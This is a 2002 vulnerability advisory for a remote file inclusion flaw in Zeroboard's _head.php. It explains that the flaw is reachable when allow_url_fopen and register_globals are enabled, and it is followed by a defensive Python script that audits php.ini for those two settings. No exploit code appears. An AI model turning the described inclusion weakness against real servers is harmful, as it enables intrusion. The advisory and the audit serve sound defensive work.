Vendor: Zeroboard
By: SecurityFocus
CVSS: 7.5 (HIGH)
CWE: 98 (Remote File Inclusion)
Product Name: Zeroboard
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Unix
2002
Zeroboard Remote File Inclusion Vulnerability
Zeroboard is a PHP web board package available for the Linux and Unix platforms. Under some circumstances, it may be possible to include arbitrary PHP files. The _head.php file does not sufficiently check or sanitize input. When the "allow_url_fopen" and "register_globals" directives in php.ini are both set to "On", it is possible to load a PHP include file from a remote URL via the _head.php script.
Mitigation:
Ensure that the "allow_url_fopen" and "register_globals" directives in php.ini are set to "Off".
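
One way to verify the mitigation across hosts is to audit the php.ini text for the two directives. This is an added example, not part of the advisory or of Zeroboard; the sample php.ini is constructed, and the code assumes a later assignment of a directive overrides an earlier one.

```python
# Directives the advisory says must be "Off". Names are case-sensitive in php.ini.
WATCHED = ("allow_url_fopen", "register_globals")

def _enabled(value):
    """PHP-style boolean: on/true/yes or any non-zero integer means enabled."""
    if value in ("on", "true", "yes"):
        return True
    return value.lstrip("-").isdigit() and int(value) != 0

def effective_settings(ini_text):
    """Return the last value assigned to each watched directive (None if unset)."""
    found = dict.fromkeys(WATCHED)
    for raw in ini_text.splitlines():
        # ';' starts a comment; safe to split here because the watched
        # directives are booleans and never contain a literal ';'.
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):      # blank, comment or [section]
            continue
        key, sep, value = line.partition("=")
        key = key.strip()
        if sep and key in found:
            found[key] = value.strip().strip("\"'").lower()
    return found

def audit(ini_text):
    """Map each watched directive to 'on', 'off' or 'unset'."""
    report = {}
    for name, value in effective_settings(ini_text).items():
        if value is None:
            # Unset means the PHP build's default applies, which the file
            # cannot show, so it is reported separately for review.
            report[name] = "unset"
        else:
            report[name] = "on" if _enabled(value) else "off"
    return report

def is_mitigated(ini_text):
    """True only when both directives are explicitly Off."""
    return all(state == "off" for state in audit(ini_text).values())

# Constructed sample, not taken from a real host.
SAMPLE_INI = """\
[PHP]
allow_url_fopen = On
register_globals = Off
;register_globals = On
allow_url_fopen = Off   ; later assignment wins
"""

if __name__ == "__main__":
    print(audit(SAMPLE_INI), is_mitigated(SAMPLE_INI))
```
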